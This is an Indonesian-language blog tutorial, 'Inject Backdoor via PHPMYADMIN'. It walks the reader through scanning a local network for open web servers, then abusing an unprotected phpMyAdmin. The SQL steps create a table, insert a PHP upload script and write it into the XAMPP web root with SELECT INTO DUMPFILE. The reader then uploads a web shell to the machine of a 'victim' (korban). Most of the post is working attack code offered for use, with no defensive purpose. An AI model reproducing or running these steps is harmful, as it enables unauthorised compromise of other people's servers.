Wednesday, May 24, 2017

Inject Backdoor via PHPMYADMIN


Pertama saya ingin memberikan keterangan apa itu Backdoor, karena kita akan membahas seputar Backdoor untuk menggunakan tutorial dibawah ini.

Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.

Oke singkat cerita kita akan langsung masuk inti penjelasannya, yang sesuai judul. Peralatan tambahan yang digunakann :

  • Angry Ip Scanner
  • Sedikit Script
  • Shell Backdoor (Disini ane menggunkana shell 3CArmy)
Pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner, Set Anggry Ip Scannernya seperti gambar di bawah ini :
Menu tools  >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya sendiri dibuat begini :


Kemudian pada tab display pilih yang host with open port only


Selanjutnya balik lagi pada menu tool >>>  Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar


oke , untuk setingan Anggry Ip Scanner nya selesai ... 
Selanjutnya sebagai dasar untuk scann, disini ane menggunakan IP ane sendiri , misal IP ane 192.168.52.100 maka pada Angry Ip Scanner ane buat jadi seperti ini :


kemudian scan dan cari yg seperti ini :


yap .. yang port apachenya open tentunya , karna dari situlah kita masuk 

NB : Tidak semua juga yang bisa , ada yg phpmyadminnya di password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo gak salah )

setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )


oke , disini kita mulai bermain dengan comand sql nya ...
Pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
create database userform

NB : userform adalah nama database yang dibuat

Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
CREATE TABLE `userform`.`user` (
`form` longtext not null
) ENGINE = MYISAM ;
klik Go

NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)

selanjutnya kita cek basedir nya dimana dengan comand :
select @@datadir
pada contoh ini ada di C:\xampp\mysql\data\



artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
INSERT INTO `userform`.`user` (
`form`
)
VALUES (
'<title>Upload File</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>
'
);
itu adalah script buat ngupload file backdoor kita nantinya ...

Jika sukses maka akan muncul seperti ini :


Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user
NB: 
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)

Kemudian klik Go

Coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php

Maaf untuk beberapa step terakhir gak ada gambarnya dikarenakan target udah offline. Jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...

Rahardyan Putra

Author & Editor

I am just a beginner who needs a lesson.

0 comments:

Post a Comment

 
biz.